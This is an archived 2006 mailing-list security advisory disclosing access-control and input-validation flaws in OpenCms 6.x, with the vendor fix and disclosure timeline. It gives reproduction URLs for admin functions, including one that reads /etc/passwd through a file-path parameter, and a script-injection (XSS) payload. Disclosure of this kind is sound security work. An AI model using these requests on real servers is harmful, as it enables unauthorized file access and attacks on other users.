lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060726142635.GA14582@pentest.test>
Date: Wed, 26 Jul 2006 22:26:36 +0800
From: Meder Kydyraliev <meder@....nu>
To: full-disclosure@...ts.grok.org.uk
Cc: bugtraq@...urityfocus.com
Subject: Multiple vulnerabilities in OpenCMS


     Multiple access control and input validation vulnerabilities in
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         OpenCMS (Open Source Website Content Management System)
         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


0. ORIGINAL ADVISORY
~~~~~~~~~~~~~~~~~~~~
http://o0o.nu/~meder/OpenCMS_multiple_vulnerabilities.txt


I. BACKGROUND
~~~~~~~~~~~~~
OpenCms is a professional level Open Source Website Content Management System.
OpenCms helps to create and manage complex websites easily without knowledge
of html. OpenCms is based on Java and XML technology. [1]


II. DESCRIPTION
~~~~~~~~~~~~~~~
OpenCms versions 6.2.1, 6.2, 6.0.3, 6.0.4 (possibly older versions too) are
vulnerable to multiple access control and input validation vulnerabilities,
which allow authenticated users to perform the following unauthrozied actions:

* View and download application's log file;
* Download arbitrary files from the system;
* View sources of JSP files (provided they are locked by some other user);
* Add webusers;
* Upload new OpenCms modules;
* Overwrite existing OpenCms modules;
* Upload database import/export files;
* Overwrite existing database import/export files;
* Send broadcast messages to all users;
* Send JavaScript to any user (XSS);
* Obtain list of all users and groups

Most of the access control vulnerabilities mentioned above can be exploited by
accessing the URL that provides the functionality, while logged in as
unprivileged user(member of Users group).

The following URLs (wrapped) can be used to reproduce the vulnerabilities on
OpenCms v.6.2:

* View and download application's log file:

   http://[target]/opencms/opencms/system/workplace/views/admin/admin-main.jsp?
    path=%2Fworkplace%2Flogfileview

* Download arbitrary files from the system:

   http://[target]/opencms/opencms/system/workplace/admin/workplace/logfileview/
    downloadTrigger.jsp?filePath=/etc/passwd

* View sources of JSP files (JSP file must be locked by any other user):

   http://[target]/opencms/opencms/system/workplace/editors/editor.jsp?
    resource=/index.jsp

* Add webusers:

   http://[target]/opencms/opencms/system/workplace/views/admin/admin-main.jsp?
    path=%2Faccounts%2Fwebusers/new

* Upload new OpenCms modules (by uploading the file with the name of existing
  module, it will be overwritten):

   http://[target]/opencms/opencms/system/workplace/views/admin/admin-main.jsp?
    path=%2Fmodules%2Fmodules_import

* Upload database import/export files (by uploading the file with the name of
  existing import/export file, it will be overwritten):

   http://[target]/opencms/opencms/system/workplace/views/admin/admin-main.jsp?
    path=%2Fdatabase%2Fimporthttp

* Send broadcast messages to all users:

   http://[target]/opencms/opencms/system/workplace/views/admin/admin-main.jsp?
    path=%2Fworkplace%2Fbroadcast

* Send arbitrary JavaScript to any user. Input the following JavaScript as message
  body to be executed in browser of user(s) message is destined to (XSS):

   </script> <script>a=/XSS BUG/; alert(a.source)</script>

* Obtain list of all users:

   http://[target]/opencms/opencms/system/workplace/views/admin/admin-main.jsp?
    path=%2Faccounts/users


Vulnerabilities outlined above may lead to server compromise, loss of confidentiality and
integrity of data stored on the server.


III. VENDOR STATUS
~~~~~~~~~~~~~~~~~~
Version 6.2.2 has been released to address discovered vulnerabilities.
New version is available at:

http://www.opencms.org/opencms/en/download/opencms.html


IV. DISCLOSURE TIMELINE
~~~~~~~~~~~~~~~~~~~~~~~
13/07/2006 - Bugreport describing the vulnerabilities submitted
18/07/2006 - Initial vendor response acknowledging issues
20/07/2006 - Fixes commited to CVS
21/07/2006 - New version(6.2.2) of OpenCMS addressing the issues released


V. ACKNOWLEDGEMENTS
~~~~~~~~~~~~~~~~~~~
Alexander Kandzior and Andreas Zahner for timely response and resolution of issues. 


VI. REFERENCES
~~~~~~~~~~~~~~
1. OpenCms (Open Source Website Content Management System) homepage, http://www.opencms.org/
2. XSS Cheat sheet, http://ha.ckers.org/xss.html
3. WebScarab, http://www.owasp.org/software/webscarab.html


-- 
http://o0o.nu/~meder

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ